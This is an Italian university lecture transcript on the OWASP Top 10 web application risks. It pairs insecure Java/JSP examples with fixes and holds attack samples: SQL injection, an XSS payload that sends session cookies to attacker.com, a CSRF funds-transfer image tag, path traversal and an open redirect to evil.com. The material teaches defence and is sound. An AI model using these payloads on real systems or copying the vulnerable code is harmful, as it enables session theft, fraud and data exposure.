OWASP Top 10  Application Security Risks              a cura di Francesco Iovine                                          ...
OWASP Top 10 Application Security Risks A1 | InjectionA2 | Cross-Site ScriptingA3 | Broken Authentication and Session Mana...
+R | I Fattori di Rischio
http://www.flickr.com/photos/doug88888/4561376850/
A1 | Injection                                                      Java                                                  ...
A1 | Injection                                                   Java                                                     ...
http://www.flickr.com/photos/dlombardia/7198892852/
A2 | Cross-Site Scripting                                                                     Java                        ...
A2 | Cross-Site Scripting                                                               JSP <div>    il nome &egrave; <c:o...
http://www.flickr.com/photos/ogimogi/2980070571
A3 | Broken Authentication     and Session Managementhttp://example.com/sale/saleitems;jsessionid=2P0OC2JDPXM0OQSNDLPSKHCJ...
A3 | Broken Authentication     and Session Management                                                       Java          ...
http://www.flickr.com/photos/lovestruck94/4462625337
A4 | Insecure Direct Object References                                                      Java                          ...
A4 | Insecure Direct Object References                                 JEE Spring Frameworks dispatcher.xml               ...
http://www.flickr.com/photos/brettdavis/3943432908
A5 | Cross-Site Request Forgery (CSRF)http://example.com/app/transferFunds?amount=1500&destAccount=4673243243             ...
A5 | Cross-Site Request Forgery (CSRF)                                                    Java                            ...
http://www.flickr.com/photos/learnscope/2547026015
A6 | Security Misconfiguration   - Framework di sviluppo non aggiornato   - Application Server: credenziali di default   - ...
A6 | Security Misconfiguration                                                   web.xml                                   ...
http://www.flickr.com/photos/zebble/6786151
A7 | Insecure Cryptographic Storage   - Backup di dati con chiave   - Database delle password con hash senza salt   - SQL ...
A7 | Insecure Cryptographic Storage                                                    Java                               ...
http://www.flickr.com/photos/brewbooks/2591952795
A8 | Failure to Restrict URL Access http://www.example.com/app/getappInfo http://www.example.com/app/admin_getappInfo
A8 | Failure to Restrict URL Access http://www.example.com/openfile.jsp?file=report.pdf http://www.example.com/openfile.js...
http://www.flickr.com/photos/clickclaker/6747794029
A9 | Insufficient Transport Layer Protection  - Autenticazione senza SSL: cattura del cookie di sessione  - Certificato SSL ...
A9 | Insufficient Transport Layer Protection                                                   web.xml                     ...
http://www.flickr.com/photos/nafmo/2226652256/
A10 | Unvalidated Redirects and Forwards   - Redirect   http://www.example.com/redirect.jsp?url=evil.com   - Forward   htt...
A10 | Unvalidated Redirects and Forwards                                  JEE Spring Frameworks WizardFormController      ...
OWASP Top 10 Application Security Risks A1 | InjectionA2 | Cross-Site ScriptingA3 | Broken Authentication and Session Mana...
+R | I Fattori di Rischio
+D | Consigli per gli sviluppatori- Requisiti di Sicurezza delle Applicazioni (ASVS)- Architettura di Sicurezza delle Appl...
+V | Consigli per i Tester- Essere organizzati- Revisione del Codice- Sicurezza e Penetration Testing
+O | Consigli per le Organizzazioni- Cominciare da subito il programma per la sicurezza applicativa- Approccio orientato a...
Riferimenti  OWASP Top 10 Project"  https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project  OWASP Development Guid...
Progetto 1          a cura di Francesco Iovine                                                        http://www.flickr.co...
Web Application SecurityViene richiesto di fornire un assessment della sicurezza di unapplicazione webutilizzando le tecni...
Web Application SecurityQuale applicazione?- OWASP Broken Web Application Projecthttps://www.owasp.org/index.php/OWASP_Bro...
Riferimenti  OWASP Top 10 Project"  https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project  OWASP Testing Guide"  ...
Credits  Simone Onofri  Marco Ramilli  Cinzia Querques
OWASP Top 10 Application Security Risks
Upcoming SlideShare
Loading in...5
×

OWASP Top 10 Application Security Risks

3,040

Published on

Creative Commons Attribution-NonCommercial-ShareAlike License

Published in: Technology, Sports

Transcript of "OWASP Top 10 Application Security Risks"

  1. 1. OWASP Top 10 Application Security Risks a cura di Francesco Iovine Università degli Studi di Roma "Tor Vergata" Facoltà di Ingegneria Corso di Sicurezza Informatica e Internet 1 Giugno 2012 http://www.flickr.com/photos/purpleslog/2880224058/
  2. 2. OWASP Top 10 Application Security Risks A1 | InjectionA2 | Cross-Site ScriptingA3 | Broken Authentication and Session ManagementA4 | Insecure Direct Object ReferencesA5 | Cross-Site Request Forgery (CSRF)A6 | Security MisconfigurationA7 | Insecure Cryptographic StorageA8 | Failure to Restrict URL AccessA9 | Insufficient Transport Layer ProtectionA10 | Unvalidated Redirects and Forwards
  3. 3. +R | I Fattori di Rischio
  4. 4. http://www.flickr.com/photos/doug88888/4561376850/
  5. 5. A1 | Injection Java String query = "SELECT * FROM accounts WHERE custID=" + request.getParameter("id") +""; http://example.com/app/accountView?id= or 1=1
  6. 6. A1 | Injection Java String selectStatement = "SELECT * FROM User WHERE userId = ? "; PreparedStatement prepStmt = con.prepareStatement(selectStatement); prepStmt.setString(1, userId); ResultSet rs = prepStmt.executeQuery();
  7. 7. http://www.flickr.com/photos/dlombardia/7198892852/
  8. 8. A2 | Cross-Site Scripting Java String page += "<input name=creditcard type=TEXT‘ value=" + request.getParameter("CC") + ">"; ><script>document.location= http://www.attacker.com/cgi-bin/cookie.cgi? foo=+document.cookie</script> JSP <% String name = resultSet.getString("name"); %> Employee Name = <%= name %>LINKhttp://example.com/page.htm?p=<script>attack(document.cookie)</script>
  9. 9. A2 | Cross-Site Scripting JSP <div> il nome &egrave; <c:out value=${param.firstName}/> </div> HTTP Header / HTML meta Element Content-Security-Policy: default-src self; img-src *; object-src media1.example.com *.cdn.example.com; script-src trustedscripts.example.com
  10. 10. http://www.flickr.com/photos/ogimogi/2980070571
  11. 11. A3 | Broken Authentication and Session Managementhttp://example.com/sale/saleitems;jsessionid=2P0OC2JDPXM0OQSNDLPSKHCJUN2JV?dest=Hawaii
  12. 12. A3 | Broken Authentication and Session Management Java public void logout() { HttpSession session = request.getSession(false); if (session != null) { session.invalidate(); } loggedIn = false; }
  13. 13. http://www.flickr.com/photos/lovestruck94/4462625337
  14. 14. A4 | Insecure Direct Object References Java String query = "SELECT * FROM accts WHERE account = ?";PreparedStatement pstmt = connection.prepareStatement(query,...);pstmt.setString(1,request.getParameter("acct"));ResultSet results = pstmt.executeQuery( );http://example.com/app/accountInfo?acct=notmyacct
  15. 15. A4 | Insecure Direct Object References JEE Spring Frameworks dispatcher.xml <bean id="userRoleAuthorizationInterceptor"class="com.example.UserRoleAuthorizationInterceptor" />
  16. 16. http://www.flickr.com/photos/brettdavis/3943432908
  17. 17. A5 | Cross-Site Request Forgery (CSRF)http://example.com/app/transferFunds?amount=1500&destAccount=4673243243 HTML on attacker-website.com <img src="http://example.com/app/transferFunds? amount=1500&destAccount=attackersAcct#“width="0" height="0" />
  18. 18. A5 | Cross-Site Request Forgery (CSRF) Java private String createToken() { String token= java.util.UUID.randomUUID().toString(); Session.setAttribute("token",token); } HTML <input type=”hidden” name=”token” value=”${sessionObject.token}”/> Java public void doPost(...) { if(!request.getSession().getAttribute("token") .equals(request.getParameter(“token”))){ throw SecurityException; } ... }
  19. 19. http://www.flickr.com/photos/learnscope/2547026015
  20. 20. A6 | Security Misconfiguration - Framework di sviluppo non aggiornato - Application Server: credenziali di default - Web Server: directory listing - Informazioni nei messaggi di errore
  21. 21. A6 | Security Misconfiguration web.xml <security-constraint> <web-resource-collection> <web-resource-name>SecureOrders</web-resource- name> <description>...</description> <url-pattern>/orders/*</url-pattern> </web-resource-collection> <auth-constraint> <role-name>assistant</role-name> <role-name>manager</role-name> </auth-constraint> <user-data-constraint> <description>SSL required</description> <transport-guarantee>CONFIDENTIAL</transport- guarantee> </user-data-constraint> </security-constraint>
  22. 22. http://www.flickr.com/photos/zebble/6786151
  23. 23. A7 | Insecure Cryptographic Storage - Backup di dati con chiave - Database delle password con hash senza salt - SQL Injection da applicazioni di front-end
  24. 24. A7 | Insecure Cryptographic Storage Java private String passwordDigest(String input) throws Exception { String output = null; byte text [] = input.getBytes(); MessageDigest algorithm = MessageDigest.getInstance ("SHA-256"); algorithm.reset(); algorithm.update(text); byte messageDigest[] = algorithm.digest(); StringBuffer hexString = new StringBuffer(); for (int i = 0; i < messageDigest.length; i++) { hexString.append(Integer.toHexString ((messageDigest[i] & 0xFF) | 0x100).toUpperCase ().substring(1,3)); } output = hexString.toString(); return output; }
  25. 25. http://www.flickr.com/photos/brewbooks/2591952795
  26. 26. A8 | Failure to Restrict URL Access http://www.example.com/app/getappInfo http://www.example.com/app/admin_getappInfo
  27. 27. A8 | Failure to Restrict URL Access http://www.example.com/openfile.jsp?file=report.pdf http://www.example.com/openfile.jsp?file=../../../../pvt-dir/pvt-file Java if (!filename.matches(“^[ a-z0-9-_]+.[a-z0-9]+$”) { throw SecurityException; }
  28. 28. http://www.flickr.com/photos/clickclaker/6747794029
  29. 29. A9 | Insufficient Transport Layer Protection - Autenticazione senza SSL: cattura del cookie di sessione - Certificato SSL non configurato correttamente: phishing - Connessione in chiaro con il database
  30. 30. A9 | Insufficient Transport Layer Protection web.xml <security-constraint> <web-resource-collection> <web-resource-name>Security page</web-resource- name> <url-pattern>/web/login/signup.jsp</url-pattern> </web-resource-collection> <user-data-constraint> <transport-guarantee>CONFIDENTIAL</transport- guarantee> </user-data-constraint> </security-constraint>
  31. 31. http://www.flickr.com/photos/nafmo/2226652256/
  32. 32. A10 | Unvalidated Redirects and Forwards - Redirect http://www.example.com/redirect.jsp?url=evil.com - Forward http://www.example.com/boring.jsp?fwd=admin.jsp
  33. 33. A10 | Unvalidated Redirects and Forwards JEE Spring Frameworks WizardFormController 1. http://www.example.com/transfer.htm 2. http://www.example.com/transfer.htm?_target1= 3. http://www.example.com/transfer.htm?_target2= 4. http://www.example.com/transfer.htm?_target3= 5. http://www.example.com/transfer.htm?_finish=
  34. 34. OWASP Top 10 Application Security Risks A1 | InjectionA2 | Cross-Site ScriptingA3 | Broken Authentication and Session ManagementA4 | Insecure Direct Object ReferencesA5 | Cross-Site Request Forgery (CSRF)A6 | Security MisconfigurationA7 | Insecure Cryptographic StorageA8 | Failure to Restrict URL AccessA9 | Insufficient Transport Layer ProtectionA10 | Unvalidated Redirects and Forwards
  35. 35. +R | I Fattori di Rischio
  36. 36. +D | Consigli per gli sviluppatori- Requisiti di Sicurezza delle Applicazioni (ASVS)- Architettura di Sicurezza delle Applicazioni (Developers Guide)- Controlli di Sicurezza Standard (ESAPI)- Ciclo di Vita di Sviluppo Sicuro (SAMM)- Conoscenza della Sicurezza delle Applicazioni (OWASP Education Project)
  37. 37. +V | Consigli per i Tester- Essere organizzati- Revisione del Codice- Sicurezza e Penetration Testing
  38. 38. +O | Consigli per le Organizzazioni- Cominciare da subito il programma per la sicurezza applicativa- Approccio orientato al rischio- Stabilire una base efficace per la sicurezza applicativa- Integrare la sicurezza nei processi esistenti- Dare visibilità al management
  39. 39. Riferimenti OWASP Top 10 Project" https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project OWASP Development Guide" https://www.owasp.org/index.php/OWASP_Guide_Project
  40. 40. Progetto 1 a cura di Francesco Iovine http://www.flickr.com/photos/purpleslog/2880224058/
  41. 41. Web Application SecurityViene richiesto di fornire un assessment della sicurezza di unapplicazione webutilizzando le tecniche indicateQuale linguaggio/framework per il codice?- Il più congeniale al gruppo di lavoroChe tipo di assessment?- focus sul testing- focus sul rischio- focus sullo sviluppo secondo le linee guida OWASP
  42. 42. Web Application SecurityQuale applicazione?- OWASP Broken Web Application Projecthttps://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project- Vulnerable Web Applications for Learninghttp://securitythoughts.wordpress.com/2010/03/22/vulnerable-web-applications-for-learning/- Una propria applicazione web sviluppata per altri progetti o scritta ad-hoc. - Nel caso si scelga unapplicazione web che abbia un front-end mobile, fornireun assessment di sicurezza per lintero sistema seguendo le linee guidadellOWASP Mobile Security Project.
  43. 43. Riferimenti OWASP Top 10 Project" https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project OWASP Testing Guide" https://www.owasp.org/index.php/OWASP_Testing_Project OWASP Development Guide" https://www.owasp.org/index.php/OWASP_Guide_Project OWASP Mobile Security Project" https://www.owasp.org/index.php/OWASP_Mobile_Security_Project
  44. 44. Credits Simone Onofri Marco Ramilli Cinzia Querques

×